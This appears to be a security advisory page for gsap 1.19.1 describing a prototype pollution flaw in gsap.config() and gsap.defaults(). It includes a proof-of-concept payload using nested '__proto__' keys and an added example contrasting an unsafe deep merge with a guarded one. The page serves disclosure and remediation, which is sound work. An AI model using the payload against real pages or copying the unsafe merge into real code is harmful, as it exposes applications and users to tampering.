gsap@1.19.1 vulnerabilities

GSAP is a robust JavaScript toolset that turns developers into animation superheroes. Build high-performance animations that work in **every** major browser. Animate CSS, SVG, canvas, React, Vue, WebGL, colors, strings, motion paths, generic objects...any

Direct Vulnerabilities

Known vulnerabilities in the gsap package. This does not include vulnerabilities belonging to this package’s dependencies.

Vulnerability: Prototype Pollution (Severity: High)

GSAP is a JavaScript library for building high-performance animations that work in every major browser. Animate CSS, SVG, canvas, React, Vue, WebGL, colors, strings, motion paths, generic objects...anything JavaScript can touch! The ScrollTrigger plug

Affected versions of this package are vulnerable to Prototype Pollution. The `gsap.config()` and `gsap.defaults()` entry points merge the caller-supplied object into GSAP's internal settings without rejecting a `__proto__` key, so an object built with `JSON.parse()` (which stores `"__proto__"` as an ordinary own property) can be walked up the prototype chain and add properties to `Object.prototype`, where every object in the page inherits them. The risk is real whenever the settings object passed to these functions is assembled from untrusted input, such as animation parameters taken from a URL or an API response.

PoC

```javascript
// PoC as given in the advisory: run in a browser page that loads gsap < 3.6.0.
// JSON.parse() turns the "__proto__" key into an own, enumerable property of
// the parsed object, which a naive recursive merge then follows.
// The payload nests "__proto__" twice because autoSleep's existing value is a
// number: the merge steps from it to Number.prototype, then to Object.prototype.
gsap.config({
  autoSleep: JSON.parse('{"__proto__":{"__proto__":{"polluted":"yes"}}}')
});

// Alternative entry point from the original PoC, via gsap.defaults():
// gsap.defaults(JSON.parse('{"__proto__":{"polluted":"yes"}}'));

// The bare identifier resolves because window inherits from Object.prototype,
// which now carries the injected "polluted" property.
document.write('Polluted : ' + polluted);
```

How to fix Prototype Pollution?

Upgrade gsap to version 3.6.0 or higher.

Vulnerable versions: <3.6.0
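The following is an added example, not GSAP's own code: a minimal recursive deep merge of the kind a `config()`/`defaults()` API performs, first in the unsafe form that the PoC above exploits, then with the key guard that stops the walk up the prototype chain. The `probe()` helper, the `isObject` check and the `FORBIDDEN` key set are this example's own names; the settings object starts with `autoSleep` as a number to mirror why the PoC payload needs two `__proto__` levels.

```javascript
// Added example (not GSAP source): unsafe vs. guarded deep merge.
const isObject = (v) => v !== null && typeof v === 'object';

// Unsafe: for...in visits the own "__proto__" key that JSON.parse creates, and
// base["__proto__"] yields the prototype, so the recursion lands on
// Number.prototype (from the numeric autoSleep) and then on Object.prototype.
function mergeDeepUnsafe(base, toMerge) {
  for (const p in toMerge) {
    base[p] = isObject(toMerge[p])
      ? mergeDeepUnsafe(base[p] || (base[p] = {}), toMerge[p])
      : toMerge[p];
  }
  return base;
}

// Guarded: skip the keys that reach the prototype chain, iterate own keys only,
// and never recurse into a primitive that happens to be stored at base[p].
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
function mergeDeepSafe(base, toMerge) {
  for (const p of Object.keys(toMerge)) {
    if (FORBIDDEN.has(p)) continue;
    base[p] = isObject(toMerge[p])
      ? mergeDeepSafe(isObject(base[p]) ? base[p] : (base[p] = {}), toMerge[p])
      : toMerge[p];
  }
  return base;
}

// Constructed payload, same shape as the advisory's PoC, wrapped as a full
// config object. JSON.parse keeps "__proto__" as an own enumerable property.
const payload = () =>
  JSON.parse('{"autoSleep":{"__proto__":{"__proto__":{"polluted":"yes"}}}}');

// Merges the payload into a settings object whose autoSleep is a number (as in
// the real defaults) and reports whether Object.prototype was polluted.
// Always cleans up so the rest of the process is unaffected.
function probe(merge) {
  const settings = { autoSleep: 120 };
  try {
    merge(settings, payload());
    return ({}).polluted === 'yes';
  } finally {
    delete Object.prototype.polluted;
  }
}

console.log('unsafe merge pollutes Object.prototype:', probe(mergeDeepUnsafe)); // true
console.log('guarded merge pollutes Object.prototype:', probe(mergeDeepSafe));  // false
```

The guard on `__proto__`, `constructor` and `prototype` is the essential part; iterating `Object.keys()` instead of `for...in` additionally keeps inherited properties out of the merge, which matters once anything else in the page has already been polluted.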